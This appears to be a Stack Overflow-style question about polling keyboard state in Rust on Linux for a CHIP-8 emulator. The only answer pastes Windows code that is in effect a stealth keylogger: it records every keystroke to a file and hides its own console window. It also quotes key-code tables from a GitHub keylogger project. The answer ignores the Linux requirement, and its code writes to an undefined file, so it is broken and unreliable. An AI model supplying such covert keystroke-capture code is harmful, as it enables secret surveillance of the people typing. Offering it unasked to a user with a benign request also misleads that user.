# How to check if a key is currently pressed in Rust?

Tags: linux, rust, terminal

I am working on a CHIP-8 emulator and the last thing I need to work on is the keyboard. I'm looking for something similar to `GetAsyncKeyState` in the Windows API, but in Linux. And also Rust.

I tried looking everywhere but I couldn't find anything. All I could find were blocking operations that wait *until* a key is pressed, while I need a function that just detects if a key is pressed ***at one point in time***.

Comment: Not really an answer, but you could turn one thing into the other by having a background thread that receives all the key press events and updates a globally readable variable (atomic or behind a mutex) with the key state. Though I'm a bit worried that that way, you might miss key presses if they're shorter than one frame. Frames might be arbitrarily long, at the mercy of your OS scheduler, after all.

Comment: What you are asking for is highly dependent on what your application is, and what is your target. Handling key bindings in a TTY is not the same thing as under an X11 server, which is again not the same thing as under Wayland.

Comment: Did you try to find other Rust applications that probably implement this? How do _they_ do it?

Answer (score 0):

you can use winapi

```
extern crate winapi;
extern crate user32;
extern crate kernel32;
use std::fs::{File, OpenOptions};
use std::io::prelude::*;
#[allow(unused_variables)]
fn main() {
    stealth();
    
    
  loop {
    for i in 8..190 {
        if unsafe { user32::GetAsyncKeyState(i) } == -32767 {
            let key: String  = match i as u32 {
                32 => " ".into(),
                8 => "[Backspace]".into(),
                13 => "\n".into(),
                winapi::VK_TAB => "[TAB]".into(),
                winapi::VK_SHIFT => "[SHIFT]".into(),
                winapi::VK_CONTROL => "[CTRL]".into(),
                winapi::VK_ESCAPE => "[ESCAPE]".into(),
                winapi::VK_END => "[END]".into(),
                winapi::VK_HOME => "[HOME]".into(),
                winapi::VK_LEFT => "[LEFT]".into(),
                winapi::VK_UP => "[UP]".into(),
                winapi::VK_RIGHT => "[RIGHT]".into(),
                winapi::VK_DOWN => "[DOWN]".into(),
                190|110 => ".".into(),
                _ => (i as u8 as char).to_string()
            };
            write!(&mut file,"{}",key).unwrap();
        }
    }
    
    unsafe { kernel32::SleepEx(1,1); }
    }
}

fn stealth() {
    let mut stealth: winapi::HWND;
    unsafe {
        kernel32::AllocConsole();
        stealth = user32::FindWindowA(std::ffi::CString::new("ConsoleWindowClass").unwrap().as_ptr(), std::ptr::null());
        user32::ShowWindow(stealth,0);
    }
}
```

and i found this input.rs in github:[input.rs](https://github.com/gsingh93/keylogger/blob/master/src/input.rs)

```
// Constants, structs, and arrays derived from /linux/include/linux/input.h

const MAX_KEYS: u16 = 112;

const EV_KEY: u16 = 1;

const KEY_RELEASE: i32 = 0;
const KEY_PRESS: i32 = 1;

const KEY_LEFTSHIFT: u16 = 42;
const KEY_RIGHTSHIFT: u16 = 43;

#[derive(Debug)]
#[repr(C)]
pub struct InputEvent {
    tv_sec: isize, // from timeval struct
    tv_usec: isize, // from timeval struct
    pub type_: u16,
    pub code: u16,
    pub value: i32
}

// Unknown key string
const UK: &'static str = "<UK>";

const KEY_NAMES: [&'static str; MAX_KEYS as usize] = [
    UK, "<ESC>",
    "1", "2", "3", "4", "5", "6", "7", "8", "9", "0", "-", "=",
    "<Backspace>", "<Tab>",
    "q", "w", "e", "r", "t", "y", "u", "i", "o", "p",
    "[", "]", "<Enter>", "<LCtrl>",
    "a", "s", "d", "f", "g", "h", "j", "k", "l", ";",
    "'", "`", "<LShift>",
    "\\", "z", "x", "c", "v", "b", "n", "m", ",", ".", "/",
    "<RShift>",
    "<KP*>",
    "<LAlt>", " ", "<CapsLock>",
    "<F1>", "<F2>", "<F3>", "<F4>", "<F5>", "<F6>", "<F7>", "<F8>", "<F9>", "<F10>",
    "<NumLock>", "<ScrollLock>",
    "<KP7>", "<KP8>", "<KP9>",
    "<KP->",
    "<KP4>", "<KP5>", "<KP6>",
    "<KP+>",
    "<KP1>", "<KP2>", "<KP3>", "<KP0>",
    "<KP.>",
    UK, UK, UK,
    "<F11>", "<F12>",
    UK, UK, UK, UK, UK, UK, UK,
    "<KPEnter>", "<RCtrl>", "<KP/>", "<SysRq>", "<RAlt>", UK,
    "<Home>", "<Up>", "<PageUp>", "<Left>", "<Right>", "<End>", "<Down>",
    "<PageDown>", "<Insert>", "<Delete>"
];

const SHIFT_KEY_NAMES: [&'static str; MAX_KEYS as usize] = [
    UK, "<ESC>",
    "!", "@", "#", "$", "%", "^", "&", "*", "(", ")", "_", "+",
    "<Backspace>", "<Tab>",
    "Q", "W", "E", "R", "T", "Y", "U", "I", "O", "P",
    "{", "}", "<Enter>", "<LCtrl>",
    "A", "S", "D", "F", "G", "H", "J", "K", "L", ":",
    "\"", "~", "<LShift>",
    "|", "Z", "X", "C", "V", "B", "N", "M", "<", ">", "?",
    "<RShift>",
    "<KP*>",
    "<LAlt>", " ", "<CapsLock>",
    "<F1>", "<F2>", "<F3>", "<F4>", "<F5>", "<F6>", "<F7>", "<F8>", "<F9>", "<F10>",
    "<NumLock>", "<ScrollLock>",
    "<KP7>", "<KP8>", "<KP9>",
    "<KP->",
    "<KP4>", "<KP5>", "<KP6>",
    "<KP+>",
    "<KP1>", "<KP2>", "<KP3>", "<KP0>",
    "<KP.>",
    UK, UK, UK,
    "<F11>", "<F12>",
    UK, UK, UK, UK, UK, UK, UK,
    "<KPEnter>", "<RCtrl>", "<KP/>", "<SysRq>", "<RAlt>", UK,
    "<Home>", "<Up>", "<PageUp>", "<Left>", "<Right>", "<End>", "<Down>",
    "<PageDown>", "<Insert>", "<Delete>"
];

// Converts a key code to it's ascii representation. Some unprintable keys like escape are printed
// as a name between angled brackets, i.e. <ESC>
pub fn get_key_text(code: u16, shift_pressed: u8) -> &'static str {
    let arr = if shift_pressed != 0 {
        SHIFT_KEY_NAMES
    } else {
        KEY_NAMES
    };

    if code < MAX_KEYS {
        return arr[code as usize];
    } else {
        debug!("Unknown key: {}", code);
        return UK;
    }
}

// Determines whether the given key code is a shift
pub fn is_shift(code: u16) -> bool {
    code == KEY_LEFTSHIFT || code == KEY_RIGHTSHIFT
}

pub fn is_key_event(type_: u16) -> bool {
    type_ == EV_KEY
}

pub fn is_key_press(value: i32) -> bool {
    value == KEY_PRESS
}

pub fn is_key_release(value: i32) -> bool {
    value == KEY_RELEASE
}
```